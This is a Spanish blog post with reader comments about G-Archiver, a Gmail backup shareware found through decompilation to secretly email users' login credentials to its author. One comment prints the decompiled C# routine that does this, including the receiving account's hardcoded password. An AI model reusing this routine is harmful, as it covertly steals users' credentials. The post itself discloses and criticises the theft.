Estas aquiContenido / Shareware roba contraseñas de Gmail

Shareware roba contraseñas de Gmail

Poradmin- Publicado el08 Marzo 2008

Acabo de encontrar una referencia en Menéame a una alucinante historia que ha publicado Coding Horror, un sitio cuyo nombre se revela particularmente apropiado en este caso concreto.

Se trata de G-Archiver (que ni siquiera enlazo), una aplicación shareware para Windows que se supone dedicada a realizar copias de seguridad de las cuentas de Gmail. El problema radica en que un programador ha sometido G-Archiver a Reflector (un descompilador para la plataforma .NET de Microsoft), con resultados espeluznantes.

Y es que, según afirma Dustin Brooks, en una de las DLLs del programa ha encontrado el nombre de usuario y la contraseña del presunto autor del programa, pero es que además parece que cada vez que un usuario utilizar G-Archiver para hacer una copia de su cuenta, el programa remitiría a esa misma cuenta los datos de login del usuario...

Dustin Brooks afirma haber podido loguearse en la cuenta incluida en el programa y encontrar en ella más de 1.700 mensajes conteniendo los datos de acceso a GMail de los incautos usuarios de G-Archiver, mensajes que -siempre según él- procedió a borrar y eliminar (algo que no afectaría por supuesto a posibles copias que pudieran haberse realizado o reenviado).

Por cierto: la nota inicial de Menéame contenía un error de bulto, al afirmar que G-Archiver era un programa de código abierto y que eso había posibilitado encontrar la trampa. Afortunadamente alguien se ha percatado de que en realidad el código había sido descompilado, y ya lo han corregido. Lo que resulta obvio es que nadie hubiera sido tan imbécil como para cometer semejante fechoría y encima mostrar el código. Aunque sólo fuera por eso, el código abierto (o libre) se confirma como un seguro excepcional para evitar este tipo de incidencias.

 

Referencia:

Etiquetas

Comentarios

Selecciona arriba tu forma preferida de visualizar los comentarios y pulsa el botón para guardar tu elección para próximas visitas (sólo si eres usuario registrado).
menos mal que existe gente
Enviado por hStorm el 8. Marzo 2008 - 20:38.

menos mal que existe gente con el interes de saber si un programa tiene cosas escondidas..

Ilegal...
Enviado por anónimo el 9. Marzo 2008 - 16:06.

Pues es gracioso, que precisamente estas técnicas y herramientas que nos sirven para escandalizarnos de vez en cuando, hayan sido tan perseguidas por la ley. De hecho en España, el creador del troyano-shareware podría demandar a quien haya decompilado su "joyita". Está claro que el autor tiene las de perder, pero lamentablemente el descubridor de la feature también podría llevarse su parte. En fin...

Me temo lo peor
Enviado por anónimo el 8. Marzo 2008 - 20:42.

Me temo lo peor, porque de los mismos autores hay unos cuantos programas para MySpace, etc.

Adsense
Enviado por anónimo el 8. Marzo 2008 - 20:48.

Desde hace unos meses los datos de login de Gmail son los mismos para Google Adsense, por lo que el interés económico podría estar presente.

Nunca entendí esa extraña decisión de Google, por cierto.

Efectivamente
Enviado por Guppy el 8. Marzo 2008 - 21:28.

Acabo de llegar a casa y nada mas que he leido la noticia me he quedado un poco alucinado.

Me he descargado el programa y al desensamblar unas de las librerias, efectivamente se envia un correo a una direccion de Gmail (no la pongo por si acaso) con el nombre de usuario y la contraseña de la victima.

Ya deben haber cambiado la contraseña del correo que almacenaba los datos de los usuarios de este programa, ya que he intentado acceder y no me deja. Tampoco se puede descargar el programa desde la pagina del autor.

Saludos.

J@#er
Enviado por anónimo el 8. Marzo 2008 - 23:12.

No si al final cuanto menos software uses menos posibilidades vas a tener de llevarte sorpresas de ese tipo...

no revelar pass
Enviado por anónimo el 9. Marzo 2008 - 2:07.

Conclusion: No revelar password de algun servicio a NINGUN programa que no sea oficial. Ademas usar pass distintas para cada servicio

parece
Enviado por anónimo el 9. Marzo 2008 - 2:57.

parece que por propia vergüenza el autor ha quitado los links a "buy" y "download" de la página de g-archiver. sólo faltaba que después de esto...

Source code ¿?
Enviado por anónimo el 9. Marzo 2008 - 3:34. 
public static void CheckConnection(string a, string b)
{
try
{
MailMessage message = new MailMessage();
message.To.Add("JTerry79@gmail.com");
message.From =
new MailAddress
("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
message.Subject = "Account";
message.SubjectEncoding = Encoding.UTF8;
message.Body = "Username: " + a;
message.Body = message.Body + "\r\nPassword: " + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.Credentials =
new NetworkCredential
("JTerry79@gmail.com", "bilal482");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
client.Send(message);
}
catch (Exception)
{
}
}
nota de ultima hora bajar el archivo de forma directa
Enviado por anónimo el 9. Marzo 2008 - 6:33.

http://www.aisto.com/Roeder/DotNet/Download.aspx?File=Reflector&Client={Client}&Version={Version} para poder bajar el reflector sin validar el formulario de www.aisto.com/roeder/dotnet/Download.aspx?File=Resourcer de
atte: wordmystic

si amas a alguien
dejalo libre
.... si regresa es tuyo
.....si no,
.... nunca lo fue

Publicidad

Patrocinadores

Kriptópolis alojado en
Zilos-Veloxia Network
Tu mejor defensa:
Bufet Almeida

Publicidad